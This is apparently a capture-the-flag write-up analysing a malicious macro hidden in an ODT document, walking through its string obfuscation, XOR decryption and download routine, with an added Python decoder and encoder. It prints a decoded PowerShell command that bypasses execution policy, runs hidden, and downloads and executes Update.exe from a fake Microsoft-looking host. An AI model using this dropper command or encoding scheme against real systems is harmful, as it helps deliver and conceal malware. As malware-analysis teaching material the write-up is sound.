FakeCTF - Malware 0x1

Jun 18, 2022

4 mins read

Category: Reverse

Creator: HømardBøy

This challenge gives us an ODT file (that I didn’t open, but you can do it at your own risk). Since it was in the Reverse category, we can easily guess we will have to reverse a macro inside the document.

That’s also what the description of the challenge tells us, pointing out that we have to identify the URL of a malicious resource downloaded by this document.

I’m not super familiar with the ODT document format, but I know one thing: OpenDocument files (like the Microsoft Office formats, by the way) are ZIP archives! Therefore we can open them with a regular archive tool.

ODT files are ZIP archives

I looked around and found a file called Module1.xml in the folder Basic/Standard. This name really reminded me of the default name for Visual Basic classes (and that’s the language used for macros).

In this XML file, we can find the VBA code of the module, which really doesn’t look appealing.

Module1.xml

The sub that caught my attention is the Main sub:

Sub Main
If vqqzycjqjpkhqvovmi() = 0 Then
Dim wzhtvfbpqbuzmustotc, Tmpwzhtvfbpqbuzmustotc As String
Dim hbtogbnfbxcaekszei, regaajfhpscnbmcwmwprjge As String
Dim ytnqvabyudituwreskajsxwdAs As String
Dim lhpvebwowSplit As Integer
If erwgpzsepdzttmjuvnovbwtc() = 1 Then
Tmpwzhtvfbpqbuzmustotc = mpocpedrdedylqthvgzdapya()
wzhtvfbpqbuzmustotc = amwxnlxcctjstjjgqlkspqnm(Tmpwzhtvfbpqbuzmustotc)
hbtogbnfbxcaekszei = cxyhvqmc(Tmpwzhtvfbpqbuzmustotc & wzhtvfbpqbuzmustotc)
regaajfhpscnbmcwmwprjge = qbyghksgdipg(hbtogbnfbxcaekszei)
regaajfhpscnbmcwmwprjge = yqzfgdmt(regaajfhpscnbmcwmwprjge)
rukbizjwgxckvFlag(regaajfhpscnbmcwmwprjge)
...

Once we clean and translate it a bit, we get:

Sub Main
    Dim FileName, FolderPath As String
    Dim FileContent, DecryptedCode As String
    FolderPath = CreateTempFolder()
    FileName = DownloadCode(FolderPath)
    FileContent = ReadFile(FolderPath & FileName)
    DecryptedCode = ReplaceThings(FileContent)
    DecryptedCode = Decrypt(DecryptedCode)
    Run(DecryptedCode)
    ...

First I checked this “DownloadCode” sub. It calls an external function from Windows called URLDownloadToFile, and since it is imported in the code, we can find its signature:

Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As Long, _
    ByVal szURL As String, _
    ByVal szqegxabjgwrvivilr As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long

From this, we infer that the URL is the second argument.

Next, something we can find across the whole script is the way it builds strings. For example:

wbsggcbesxgmx = Chr(104) & "" & Chr(116) & "" & Chr(116) & "" & Chr(112) & "" & Chr(115) & "" & Chr(58) & "" & Chr(47) & "" & Chr(47) & "" & Chr(114) & "" & Chr(101) & "" & Chr(110) & "" & Chr(116) & "" & Chr(114) & "" & Chr(121) & "" & Chr(46) & "" & Chr(99) & "" & Chr(111) & "" & Chr(47) & "" & Chr(116) & "" & Chr(54) & "" & Chr(57) & "" & Chr(104) & "" & Chr(104) & "" & Chr(52) & "" & Chr(47) & "" & Chr(114) & "" & Chr(97) & "" & Chr(119) & ""
URLDownloadToFile(ynkgtlqhx, wbsggcbesxgmx, Macrokvjymzmbg, ynkgtlqhx, ynkgtlqhx)

I chose this example on purpose because it builds the string used as the URL. The resulting URL is: https://rentry.co/t69hh4/raw

I tried this URL as the flag but obviously it couldn’t be that simple. In fact, the content of this file is a very big number:

509923764891063459923764891063539923764891063399923764891063489923764891063499923764891063429923764891063399923764891063469923764891063469923764891063108992376489106339992376489106358992376489106339992376489106398992376...

So let’s look at the other subs:

Function ReplaceThings(BigNumber As String) As String
    Dim result As String
    ' Strip the junk marker first, then turn the separator into a space
    result = Replace(BigNumber, "9657665657376593676575387986", "")
    result = Replace(result, "9923764891063", " ")
    ReplaceThings = result
End Function

Function Decrypt(EncryptedString As String) As String
    Dim Characters() As String
    Dim c As Variant
    Dim result As String
    result = ""
    Characters = Split(EncryptedString, " ")
    For Each c In Characters
        ' Each number is one character XORed with 66; skip empty tokens
        ' left by a trailing separator
        If Len(c) > 0 Then result = result & Chr(CInt(c) Xor 66)
    Next
    Decrypt = result
End Function

From there, decrypting the text is straightforward with those two functions. We then get:

powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile("http://microsoft.security.update.fake/files/Update.exe","$env:APPDATA\\Update.exe"); Start-Process ("$env:APPDATA\\Update.exe")

And we get a new URL which is the flag: http://microsoft.security.update.fake/files/Update.exe
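As an added example that is not part of the original write-up, here is a small Python decoder reproducing the two decoding steps used above: collapsing the Chr() chains into their literal (the first URL), and running the ReplaceThings/Decrypt logic over the number blob. The constants and the two sample inputs are taken from the macro as shown on this page; encode_number_blob is my own inverse helper, used only to build extra test input.

```python
import re

# Constants taken from the macro's ReplaceThings / Decrypt subs
JUNK = "9657665657376593676575387986"  # stripped first
SEP = "9923764891063"                  # then replaced by a space
XOR_KEY = 66

# Inputs copied from the macro: the Chr() chain that builds the first URL,
# and the start of the downloaded number blob (up to its last complete number)
PAGE_CHR_EXPR = (
    'Chr(104) & "" & Chr(116) & "" & Chr(116) & "" & Chr(112) & "" & Chr(115) & "" & Chr(58) & "" & Chr(47) & "" & Chr(47) & "" & '
    'Chr(114) & "" & Chr(101) & "" & Chr(110) & "" & Chr(116) & "" & Chr(114) & "" & Chr(121) & "" & Chr(46) & "" & Chr(99) & "" & '
    'Chr(111) & "" & Chr(47) & "" & Chr(116) & "" & Chr(54) & "" & Chr(57) & "" & Chr(104) & "" & Chr(104) & "" & Chr(52) & "" & '
    'Chr(47) & "" & Chr(114) & "" & Chr(97) & "" & Chr(119) & ""'
)
PAGE_BLOB_PREFIX = (
    "509923764891063459923764891063539923764891063399923764891063489923764891063"
    "499923764891063429923764891063399923764891063469923764891063469923764891063"
    "108992376489106339992376489106358992376489106339992376489106398"
)

CHR_CALL = re.compile(r"Chr\((\d+)\)")

def decode_chr_concat(expr: str) -> str:
    """Collapse a Chr(n) & "" & Chr(m) ... chain into the literal it builds."""
    return "".join(chr(int(n)) for n in CHR_CALL.findall(expr))

def decode_number_blob(blob: str) -> str:
    """Mirror ReplaceThings + Decrypt: drop JUNK, split on SEP, XOR each number with 66.
    Empty tokens (e.g. a trailing separator) are skipped; the macro's Chr("") would error there."""
    cleaned = blob.replace(JUNK, "").replace(SEP, " ")
    return "".join(chr(int(tok) ^ XOR_KEY) for tok in cleaned.split())

def encode_number_blob(text: str, junk_every: int = 4) -> str:
    """Inverse of the scheme (my own helper, only to build test input): XOR each
    character with 66, glue JUNK onto every junk_every-th number, join with SEP."""
    parts = []
    for i, ch in enumerate(text):
        num = str(ord(ch) ^ XOR_KEY)
        if i and i % junk_every == 0:
            num += JUNK
        parts.append(num)
    return SEP.join(parts)

if __name__ == "__main__":
    print(decode_chr_concat(PAGE_CHR_EXPR))            # https://rentry.co/t69hh4/raw
    print(repr(decode_number_blob(PAGE_BLOB_PREFIX)))  # 'powershell.exe '
```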
